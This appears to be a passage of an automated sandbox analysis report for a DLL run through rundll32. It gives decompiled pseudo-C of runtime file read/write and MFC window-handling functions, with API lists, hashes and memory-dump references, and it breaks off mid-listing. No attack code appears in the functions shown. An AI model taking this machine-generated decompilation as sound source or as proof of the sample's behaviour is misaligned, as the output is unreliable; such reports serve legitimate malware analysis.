                                                                                                            • Instruction Fuzzy Hash: 7A01623650056ABFDB129F569C48EEE37ADEF017D0F514115FD11EA161D730DA01DB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001B36C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 167fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1001B36C(signed int _a4, signed int _a8, long _a12) {
				void _v5;
				signed int _v12;
				long _v16;
				signed int _t79;
				void* _t82;
				signed int _t86;
				signed int* _t89;
				long _t90;
				void* _t92;
				intOrPtr _t93;
				signed int _t97;
				intOrPtr _t98;
				char _t100;
				signed int _t101;
				long _t103;
				long _t106;
				signed int _t107;
				signed int _t113;
				signed int _t114;
				signed char _t117;
				intOrPtr _t118;
				long _t120;
				void* _t124;
				intOrPtr* _t125;
				signed int _t127;
				signed char* _t128;
				void* _t129;
				void* _t130;

				_v12 = _v12 & 0x00000000;
				_t113 = _a8;
				_t124 = _t113;
				if(_a12 == 0) {
					L42:
					__eflags = 0;
					return 0;
				}
				_t79 = _a4;
				_t125 = 0x1004f920 + (_t79 >> 5) * 4;
				_t127 = (_t79 & 0x0000001f) + (_t79 & 0x0000001f) * 8 << 2;
				_t82 =  *_t125 + _t127;
				_t117 =  *((intOrPtr*)(_t82 + 4));
				if((_t117 & 0x00000002) != 0) {
					goto L42;
				}
				if((_t117 & 0x00000048) != 0 &&  *((char*)(_t82 + 5)) != 0xa) {
					_a12 = _a12 - 1;
					 *_t113 =  *((intOrPtr*)( *_t125 + _t127 + 5));
					_t124 = _t113 + 1;
					_v12 = 1;
					 *((char*)( *_t125 + _t127 + 5)) = 0xa;
				}
				if(ReadFile( *( *_t125 + _t127), _t124, _a12,  &_v16, 0) != 0) {
					_t86 = _v16;
					_t118 =  *_t125;
					_v12 = _v12 + _t86;
					__eflags =  *(_t118 + _t127 + 4) & 0x00000080;
					if(( *(_t118 + _t127 + 4) & 0x00000080) == 0) {
						L41:
						return _v12;
					}
					__eflags = _t86;
					if(_t86 == 0) {
						L15:
						_t89 =  *_t125 + _t127 + 4;
						 *_t89 =  *_t89 & 0x000000fb;
						__eflags =  *_t89;
						L16:
						_t90 = _a8;
						_t120 = _v12 + _t90;
						__eflags = _t90 - _t120;
						_a12 = _t90;
						_v12 = _t120;
						if(_t90 >= _t120) {
							L40:
							_t114 = _t113 - _a8;
							__eflags = _t114;
							_v12 = _t114;
							goto L41;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t92 =  *_a12;
							__eflags = _t92 - 0x1a;
							if(_t92 == 0x1a) {
								break;
							}
							__eflags = _t92 - 0xd;
							if(_t92 == 0xd) {
								__eflags = _a12 - _t120 - 1;
								if(_a12 >= _t120 - 1) {
									_a12 = _a12 + 1;
									_t97 = ReadFile( *( *_t125 + _t127),  &_v5, 1,  &_v16, 0);
									__eflags = _t97;
									if(_t97 != 0) {
										L26:
										__eflags = _v16;
										if(_v16 == 0) {
											L34:
											 *_t113 = 0xd;
											L35:
											_t113 = _t113 + 1;
											__eflags = _t113;
											L36:
											_t120 = _v12;
											__eflags = _a12 - _t120;
											if(_a12 < _t120) {
												continue;
											}
											goto L40;
										}
										_t98 =  *_t125;
										__eflags =  *(_t98 + _t127 + 4) & 0x00000048;
										if(( *(_t98 + _t127 + 4) & 0x00000048) == 0) {
											__eflags = _t113 - _a8;
											if(__eflags != 0) {
												L33:
												E1001968C(__eflags, _a4, 0xffffffff, 1);
												_t130 = _t130 + 0xc;
												__eflags = _v5 - 0xa;
												if(_v5 == 0xa) {
													goto L36;
												}
												goto L34;
											}
											__eflags = _v5 - 0xa;
											if(__eflags != 0) {
												goto L33;
											}
											L32:
											 *_t113 = 0xa;
											goto L35;
										}
										_t100 = _v5;
										__eflags = _t100 - 0xa;
										if(_t100 == 0xa) {
											goto L32;
										}
										 *_t113 = 0xd;
										 *((char*)( *_t125 + _t127 + 5)) = _t100;
										goto L35;
									}
									_t101 = GetLastError();
									__eflags = _t101;
									if(_t101 != 0) {
										goto L34;
									}
									goto L26;
								}
								_t103 = _a12 + 1;
								__eflags =  *_t103 - 0xa;
								if( *_t103 != 0xa) {
									_a12 = _t103;
									goto L34;
								}
								_a12 = _a12 + 2;
								goto L32;
							}
							 *_t113 = _t92;
							_t113 = _t113 + 1;
							_a12 = _a12 + 1;
							goto L36;
						}
						_t93 =  *_t125;
						__eflags =  *(_t93 + _t127 + 4) & 0x00000040;
						if(( *(_t93 + _t127 + 4) & 0x00000040) == 0) {
							_t128 = _t93 + _t127 + 4;
							 *_t128 =  *_t128 | 0x00000002;
							__eflags =  *_t128;
						}
						goto L40;
					}
					__eflags =  *_t113 - 0xa;
					if( *_t113 != 0xa) {
						goto L15;
					}
					 *(_t118 + _t127 + 4) =  *(_t118 + _t127 + 4) | 0x00000004;
					goto L16;
				} else {
					_t106 = GetLastError();
					_t129 = 5;
					if(_t106 != _t129) {
						__eflags = _t106 - 0x6d;
						if(_t106 == 0x6d) {
							goto L42;
						}
						_t107 = E10013707(_t106);
						L10:
						return _t107 | 0xffffffff;
					}
					 *((intOrPtr*)(E100136F5())) = 9;
					_t107 = E100136FE();
					 *_t107 = _t129;
					goto L10;
				}
			}































                                                                                                            0x1001b372
                                                                                                            0x1001b37b
                                                                                                            0x1001b380
                                                                                                            0x1001b382
                                                                                                            0x1001b540
                                                                                                            0x1001b540
                                                                                                            0x00000000
                                                                                                            0x1001b540
                                                                                                            0x1001b388
                                                                                                            0x1001b396
                                                                                                            0x1001b39f
                                                                                                            0x1001b3a2
                                                                                                            0x1001b3a4
                                                                                                            0x1001b3aa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b3b3
                                                                                                            0x1001b3c1
                                                                                                            0x1001b3c4
                                                                                                            0x1001b3c8
                                                                                                            0x1001b3cb
                                                                                                            0x1001b3d2
                                                                                                            0x1001b3d2
                                                                                                            0x1001b3ee
                                                                                                            0x1001b429
                                                                                                            0x1001b42c
                                                                                                            0x1001b42e
                                                                                                            0x1001b431
                                                                                                            0x1001b436
                                                                                                            0x1001b53b
                                                                                                            0x00000000
                                                                                                            0x1001b53b
                                                                                                            0x1001b43c
                                                                                                            0x1001b43e
                                                                                                            0x1001b450
                                                                                                            0x1001b452
                                                                                                            0x1001b456
                                                                                                            0x1001b456
                                                                                                            0x1001b459
                                                                                                            0x1001b459
                                                                                                            0x1001b45f
                                                                                                            0x1001b461
                                                                                                            0x1001b463
                                                                                                            0x1001b466
                                                                                                            0x1001b469
                                                                                                            0x1001b535
                                                                                                            0x1001b535
                                                                                                            0x1001b535
                                                                                                            0x1001b538
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b46f
                                                                                                            0x1001b46f
                                                                                                            0x1001b472
                                                                                                            0x1001b474
                                                                                                            0x1001b476
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b47c
                                                                                                            0x1001b47e
                                                                                                            0x1001b48c
                                                                                                            0x1001b48f
                                                                                                            0x1001b4a5
                                                                                                            0x1001b4b9
                                                                                                            0x1001b4bf
                                                                                                            0x1001b4c1
                                                                                                            0x1001b4cd
                                                                                                            0x1001b4cd
                                                                                                            0x1001b4d1
                                                                                                            0x1001b513
                                                                                                            0x1001b513
                                                                                                            0x1001b516
                                                                                                            0x1001b516
                                                                                                            0x1001b516
                                                                                                            0x1001b517
                                                                                                            0x1001b517
                                                                                                            0x1001b51a
                                                                                                            0x1001b51d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b523
                                                                                                            0x1001b4d3
                                                                                                            0x1001b4d5
                                                                                                            0x1001b4da
                                                                                                            0x1001b4ee
                                                                                                            0x1001b4f1
                                                                                                            0x1001b4fe
                                                                                                            0x1001b505
                                                                                                            0x1001b50a
                                                                                                            0x1001b50d
                                                                                                            0x1001b511
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b511
                                                                                                            0x1001b4f3
                                                                                                            0x1001b4f7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b4f9
                                                                                                            0x1001b4f9
                                                                                                            0x00000000
                                                                                                            0x1001b4f9
                                                                                                            0x1001b4dc
                                                                                                            0x1001b4df
                                                                                                            0x1001b4e1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b4e3
                                                                                                            0x1001b4e8
                                                                                                            0x00000000
                                                                                                            0x1001b4e8
                                                                                                            0x1001b4c3
                                                                                                            0x1001b4c9
                                                                                                            0x1001b4cb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b4cb
                                                                                                            0x1001b494
                                                                                                            0x1001b495
                                                                                                            0x1001b498
                                                                                                            0x1001b4a0
                                                                                                            0x00000000
                                                                                                            0x1001b4a0
                                                                                                            0x1001b49a
                                                                                                            0x00000000
                                                                                                            0x1001b49a
                                                                                                            0x1001b480
                                                                                                            0x1001b482
                                                                                                            0x1001b483
                                                                                                            0x00000000
                                                                                                            0x1001b483
                                                                                                            0x1001b525
                                                                                                            0x1001b527
                                                                                                            0x1001b52c
                                                                                                            0x1001b52e
                                                                                                            0x1001b532
                                                                                                            0x1001b532
                                                                                                            0x1001b532
                                                                                                            0x00000000
                                                                                                            0x1001b52c
                                                                                                            0x1001b440
                                                                                                            0x1001b443
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b44b
                                                                                                            0x00000000
                                                                                                            0x1001b3f0
                                                                                                            0x1001b3f0
                                                                                                            0x1001b3f8
                                                                                                            0x1001b3fb
                                                                                                            0x1001b411
                                                                                                            0x1001b414
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b41b
                                                                                                            0x1001b421
                                                                                                            0x00000000
                                                                                                            0x1001b421
                                                                                                            0x1001b402
                                                                                                            0x1001b408
                                                                                                            0x1001b40d
                                                                                                            0x00000000
                                                                                                            0x1001b40d

                                                                                                            APIs
                                                                                                            • ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 1001B3E6
                                                                                                            • GetLastError.KERNEL32(?,?,?), ref: 1001B3F0
                                                                                                            • ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 1001B4B9
                                                                                                            • GetLastError.KERNEL32(?,?,?), ref: 1001B4C3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastRead
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1948546556-4125583295
                                                                                                            • Opcode ID: 1586ebca8aaa9a6ea4319f4853b1feeec289fced979c0bdf45d6e5b6f0657abd
                                                                                                            • Instruction ID: 3bbfbaef22ec515d269d62fd47d355a82d48074a4c8ee7a64ff4f0343116150f
                                                                                                            • Opcode Fuzzy Hash: 1586ebca8aaa9a6ea4319f4853b1feeec289fced979c0bdf45d6e5b6f0657abd
                                                                                                            • Instruction Fuzzy Hash: DB61D374A04B89DFDB21CFA8C880B997BF0EF05354F158099E9618F2A2D770DAC1CB11
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100197AB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145fileCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100197AB(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t68;
				void** _t73;
				signed int _t74;
				long _t76;
				intOrPtr _t79;
				signed int _t81;
				char* _t86;
				int _t91;
				long _t93;
				intOrPtr* _t100;
				void* _t102;
				signed int _t107;
				char _t110;
				struct _OVERLAPPED* _t112;
				long _t115;
				signed int _t118;
				struct _OVERLAPPED* _t120;
				void* _t121;
				void* _t123;

				_t121 = _t123 - 0x3a0;
				_t68 =  *0x1004c470; // 0x6edecb8c
				_t112 = 0;
				 *((intOrPtr*)(_t121 + 0x39c)) = _t68;
				 *(_t121 - 0x78) = 0;
				 *((intOrPtr*)(_t121 - 0x7c)) = 0;
				if( *(_t121 + 0x3b0) != 0) {
					_t100 = 0x1004f920 + ( *(_t121 + 0x3a8) >> 5) * 4;
					_t118 = ( *(_t121 + 0x3a8) & 0x0000001f) + ( *(_t121 + 0x3a8) & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t100 + _t118 + 4) & 0x00000020;
					if(__eflags != 0) {
						E1001B190(_t102, __eflags,  *(_t121 + 0x3a8), 0, 0, 2);
					}
					_t73 =  *_t100 + _t118;
					__eflags = _t73[1] & 0x00000080;
					if((_t73[1] & 0x00000080) == 0) {
						_t74 = WriteFile( *_t73,  *(_t121 + 0x3ac),  *(_t121 + 0x3b0), _t121 - 0x80, _t112);
						__eflags = _t74;
						if(_t74 == 0) {
							 *(_t121 - 0x6c) = GetLastError();
						} else {
							 *(_t121 - 0x6c) = _t112;
							 *(_t121 - 0x78) =  *(_t121 - 0x80);
						}
					} else {
						__eflags =  *(_t121 + 0x3b0) - _t112;
						 *(_t121 - 0x74) =  *(_t121 + 0x3ac);
						 *(_t121 - 0x6c) = _t112;
						if( *(_t121 + 0x3b0) <= _t112) {
							L25:
							_t79 =  *_t100;
							__eflags =  *(_t79 + _t118 + 4) & 0x00000040;
							if(( *(_t79 + _t118 + 4) & 0x00000040) == 0) {
								L28:
								 *((intOrPtr*)(E100136F5())) = 0x1c;
								_t81 = E100136FE();
								 *_t81 = _t112;
								L29:
								_t77 = _t81 | 0xffffffff;
								L31:
								goto L32;
							}
							__eflags =  *( *(_t121 + 0x3ac)) - 0x1a;
							if( *( *(_t121 + 0x3ac)) != 0x1a) {
								goto L28;
							}
							_t77 = 0;
							goto L31;
						} else {
							goto L6;
						}
						do {
							L6:
							_t107 =  *(_t121 - 0x74) -  *(_t121 + 0x3ac);
							__eflags = _t107;
							_t86 = _t121 - 0x68;
							 *(_t121 - 0x70) = _t112;
							do {
								__eflags = _t107 -  *(_t121 + 0x3b0);
								if(_t107 >=  *(_t121 + 0x3b0)) {
									break;
								}
								 *(_t121 - 0x74) =  *(_t121 - 0x74) + 1;
								_t110 =  *( *(_t121 - 0x74));
								_t107 = _t107 + 1;
								__eflags = _t110 - 0xa;
								if(_t110 == 0xa) {
									 *((intOrPtr*)(_t121 - 0x7c)) =  *((intOrPtr*)(_t121 - 0x7c)) + 1;
									 *_t86 = 0xd;
									_t86 = _t86 + 1;
									_t34 = _t121 - 0x70;
									 *_t34 =  &( *(_t121 - 0x70)->Internal);
									__eflags =  *_t34;
								}
								 *_t86 = _t110;
								_t86 = _t86 + 1;
								 *(_t121 - 0x70) =  &( *(_t121 - 0x70)->Internal);
								__eflags =  *(_t121 - 0x70) - 0x400;
							} while ( *(_t121 - 0x70) < 0x400);
							_t115 = _t86 - _t121 - 0x68;
							_t91 = WriteFile( *( *_t100 + _t118), _t121 - 0x68, _t115, _t121 - 0x80, 0);
							__eflags = _t91;
							if(_t91 == 0) {
								 *(_t121 - 0x6c) = GetLastError();
								L16:
								_t112 = 0;
								__eflags = 0;
								L17:
								_t76 =  *(_t121 - 0x78);
								__eflags = _t76 - _t112;
								if(_t76 != _t112) {
									_t77 = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
									__eflags = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
									goto L31;
								}
								__eflags =  *(_t121 - 0x6c) - _t112;
								if( *(_t121 - 0x6c) == _t112) {
									goto L25;
								}
								_t120 = 5;
								__eflags =  *(_t121 - 0x6c) - _t120;
								if( *(_t121 - 0x6c) != _t120) {
									_t81 = E10013707( *(_t121 - 0x6c));
								} else {
									 *((intOrPtr*)(E100136F5())) = 9;
									_t81 = E100136FE();
									 *_t81 = _t120;
								}
								goto L29;
							}
							_t93 =  *(_t121 - 0x80);
							 *(_t121 - 0x78) =  *(_t121 - 0x78) + _t93;
							__eflags = _t93 - _t115;
							if(_t93 < _t115) {
								goto L16;
							}
							_t112 = 0;
							__eflags =  *(_t121 - 0x74) -  *(_t121 + 0x3ac) -  *(_t121 + 0x3b0);
						} while ( *(_t121 - 0x74) -  *(_t121 + 0x3ac) <  *(_t121 + 0x3b0));
					}
					goto L17;
				} else {
					_t77 = 0;
					L32:
					return E100117AE(_t77,  *((intOrPtr*)(_t121 + 0x39c)));
				}
			}






















                                                                                                            0x100197ac
                                                                                                            0x100197b9
                                                                                                            0x100197bf
                                                                                                            0x100197c7
                                                                                                            0x100197cd
                                                                                                            0x100197d0
                                                                                                            0x100197d3
                                                                                                            0x100197f3
                                                                                                            0x100197fc
                                                                                                            0x100197ff
                                                                                                            0x10019804
                                                                                                            0x10019810
                                                                                                            0x10019815
                                                                                                            0x1001981a
                                                                                                            0x1001981c
                                                                                                            0x10019820
                                                                                                            0x10019906
                                                                                                            0x1001990c
                                                                                                            0x1001990e
                                                                                                            0x10019921
                                                                                                            0x10019910
                                                                                                            0x10019913
                                                                                                            0x10019916
                                                                                                            0x10019916
                                                                                                            0x10019826
                                                                                                            0x10019826
                                                                                                            0x10019832
                                                                                                            0x10019835
                                                                                                            0x10019838
                                                                                                            0x10019931
                                                                                                            0x10019931
                                                                                                            0x10019933
                                                                                                            0x10019938
                                                                                                            0x10019949
                                                                                                            0x1001994e
                                                                                                            0x10019954
                                                                                                            0x10019959
                                                                                                            0x1001995b
                                                                                                            0x1001995b
                                                                                                            0x10019963
                                                                                                            0x00000000
                                                                                                            0x10019964
                                                                                                            0x10019940
                                                                                                            0x10019943
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019945
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001983e
                                                                                                            0x1001983e
                                                                                                            0x10019841
                                                                                                            0x10019841
                                                                                                            0x10019847
                                                                                                            0x1001984a
                                                                                                            0x1001984d
                                                                                                            0x1001984d
                                                                                                            0x10019853
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019858
                                                                                                            0x1001985b
                                                                                                            0x1001985d
                                                                                                            0x1001985e
                                                                                                            0x10019861
                                                                                                            0x10019863
                                                                                                            0x10019866
                                                                                                            0x10019869
                                                                                                            0x1001986a
                                                                                                            0x1001986a
                                                                                                            0x1001986a
                                                                                                            0x1001986a
                                                                                                            0x1001986d
                                                                                                            0x1001986f
                                                                                                            0x10019870
                                                                                                            0x10019873
                                                                                                            0x10019873
                                                                                                            0x10019881
                                                                                                            0x10019893
                                                                                                            0x10019899
                                                                                                            0x1001989b
                                                                                                            0x100198c2
                                                                                                            0x100198c5
                                                                                                            0x100198c5
                                                                                                            0x100198c5
                                                                                                            0x100198c7
                                                                                                            0x100198c7
                                                                                                            0x100198ca
                                                                                                            0x100198cc
                                                                                                            0x10019960
                                                                                                            0x10019960
                                                                                                            0x00000000
                                                                                                            0x10019960
                                                                                                            0x100198d2
                                                                                                            0x100198d5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100198d9
                                                                                                            0x100198da
                                                                                                            0x100198dd
                                                                                                            0x10019929
                                                                                                            0x100198df
                                                                                                            0x100198e4
                                                                                                            0x100198ea
                                                                                                            0x100198ef
                                                                                                            0x100198ef
                                                                                                            0x00000000
                                                                                                            0x100198dd
                                                                                                            0x1001989d
                                                                                                            0x100198a0
                                                                                                            0x100198a3
                                                                                                            0x100198a5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100198b0
                                                                                                            0x100198b2
                                                                                                            0x100198b2
                                                                                                            0x100198ba
                                                                                                            0x00000000
                                                                                                            0x100197d5
                                                                                                            0x100197d5
                                                                                                            0x10019965
                                                                                                            0x10019978
                                                                                                            0x10019978

                                                                                                            APIs
                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,1004C878,00000001), ref: 10019893
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 3934441357-4125583295
                                                                                                            • Opcode ID: 965eb31f54da86365c2da1447df739003087db675420f9f90e2f522ac335ea6e
                                                                                                            • Instruction ID: bcb25415e8510b231303bc6364b9eff1bf1e0548ad7273a78b3d91e774eab1a2
                                                                                                            • Opcode Fuzzy Hash: 965eb31f54da86365c2da1447df739003087db675420f9f90e2f522ac335ea6e
                                                                                                            • Instruction Fuzzy Hash: AD513671900298DFDB22CFA9C880ADDBBF8FF46744F21411AE9599F256DB309A81CF11
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10022233 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10022233(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				long _t34;
				long _t43;
				struct HWND__* _t48;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E1001F7AE();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x1c)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x1c)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x20)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x44));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x44)) = 0;
				}
				_t64 =  *(_t72 + 0x48);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x48) =  *(_t72 + 0x48) & 0x00000000;
				if(( *(_t72 + 0x38) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E100373DB() + 0x3c));
					if(_t71 != 0 &&  *(_t71 + 0x1c) != 0) {
						E10011C50( &_v52, 0, 0x30);
						_t48 =  *(_t72 + 0x1c);
						_v44 = _t48;
						_v40 = _t48;
						_v52 = 0x28;
						_v48 = 1;
						SendMessageA( *(_t71 + 0x1c), 0x405, 0,  &_v52);
					}
				}
				_t34 = GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc);
				E1002204B(_t72);
				if(GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc) == _t34) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x1c), 0xfffffffc, _t43);
					}
				}
				E10022168(_t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}















                                                                                                            0x1002223c
                                                                                                            0x10022243
                                                                                                            0x10022249
                                                                                                            0x1002224e
                                                                                                            0x10022273
                                                                                                            0x10022273
                                                                                                            0x10022279
                                                                                                            0x1002227b
                                                                                                            0x1002227b
                                                                                                            0x10022279
                                                                                                            0x1002227e
                                                                                                            0x10022283
                                                                                                            0x10022287
                                                                                                            0x1002228a
                                                                                                            0x1002228a
                                                                                                            0x1002228d
                                                                                                            0x10022295
                                                                                                            0x1002229a
                                                                                                            0x1002229a
                                                                                                            0x1002229d
                                                                                                            0x100222a4
                                                                                                            0x100222ab
                                                                                                            0x100222b0
                                                                                                            0x100222c0
                                                                                                            0x100222c5
                                                                                                            0x100222cb
                                                                                                            0x100222ce
                                                                                                            0x100222df
                                                                                                            0x100222e6
                                                                                                            0x100222e9
                                                                                                            0x100222e9
                                                                                                            0x100222b0
                                                                                                            0x100222fb
                                                                                                            0x10022301
                                                                                                            0x10022310
                                                                                                            0x1002231c
                                                                                                            0x10022320
                                                                                                            0x10022328
                                                                                                            0x10022328
                                                                                                            0x10022320
                                                                                                            0x10022330
                                                                                                            0x10022343

                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 100222E9
                                                                                                            • GetWindowLongA.USER32 ref: 100222FB
                                                                                                            • GetWindowLongA.USER32 ref: 1002230C
                                                                                                            • SetWindowLongA.USER32 ref: 10022328
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LongWindow$MessageSend
                                                                                                            • String ID: (
                                                                                                            • API String ID: 2178440468-3887548279
                                                                                                            • Opcode ID: a0256d8b5034a2fee01dc273fb99e3b5b93d09b5292866429bde14ed636a8408
                                                                                                            • Instruction ID: 74d92888995a03eb436cf4db0a6f1431d092ba1e50ceac8416b65ae125f9645e
                                                                                                            • Opcode Fuzzy Hash: a0256d8b5034a2fee01dc273fb99e3b5b93d09b5292866429bde14ed636a8408
                                                                                                            • Instruction Fuzzy Hash: 0C31AD34600615FFCB21DFA9E884A6EB7F8FF04250F52062DE5429B692CB31F848CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10032286 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10032286(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
				void* __ebp;
				void* _t29;
				int _t30;
				void* _t35;
				void* _t38;
				intOrPtr* _t40;
				int _t42;
				intOrPtr* _t45;
				void* _t46;

				_t45 = __ecx;
				_t29 = E10022AD5(__ecx);
				_t40 =  *((intOrPtr*)(_t45 + 0x7c));
				_t42 = _a4;
				_t38 = _t29;
				if(_t40 == 0) {
					L2:
					if(_a8 != 0xffff) {
						if(_t42 == 0 || (_a8 & 0x00000810) != 0) {
							 *(_t45 + 0xa4) =  *(_t45 + 0xa4) & 0x00000000;
							goto L17;
						} else {
							if(_t42 < 0xf000 || _t42 >= 0xf1f0) {
								if(_t42 < 0xff00) {
									goto L13;
								}
								 *(_t45 + 0xa4) = 0xef1f;
								goto L17;
							} else {
								_t42 = (_t42 + 0xffff1000 >> 4) + 0xef00;
								L13:
								 *(_t45 + 0xa4) = _t42;
								L17:
								 *(_t38 + 0x38) =  *(_t38 + 0x38) | 0x00000040;
								L18:
								_t30 =  *(_t45 + 0xa4);
								if(_t30 ==  *((intOrPtr*)(_t45 + 0xa8))) {
									L21:
									return _t30;
								}
								_t30 = E100220EE(_t46, GetParent( *(_t45 + 0x1c)));
								if(_t30 == 0) {
									goto L21;
								}
								return PostMessageA( *(_t45 + 0x1c), 0x36a, 0, 0);
							}
						}
					}
					 *(_t45 + 0x38) =  *(_t45 + 0x38) & 0xffffffbf;
					if( *((intOrPtr*)(_t38 + 0x64)) != 0) {
						 *(_t45 + 0xa4) = 0xe002;
					} else {
						 *(_t45 + 0xa4) = 0xe001;
					}
					SendMessageA( *(_t45 + 0x1c), 0x362,  *(_t45 + 0xa4), 0);
					_t35 =  *((intOrPtr*)( *_t45 + 0x150))();
					if(_t35 != 0) {
						UpdateWindow( *(_t35 + 0x1c));
					}
					goto L18;
				}
				_t30 =  *((intOrPtr*)( *_t40 + 0x7c))(_t42, _a8, _a12);
				if(_t30 != 0) {
					goto L21;
				}
				goto L2;
			}












                                                                                                            0x1003228c
                                                                                                            0x1003228e
                                                                                                            0x10032293
                                                                                                            0x10032298
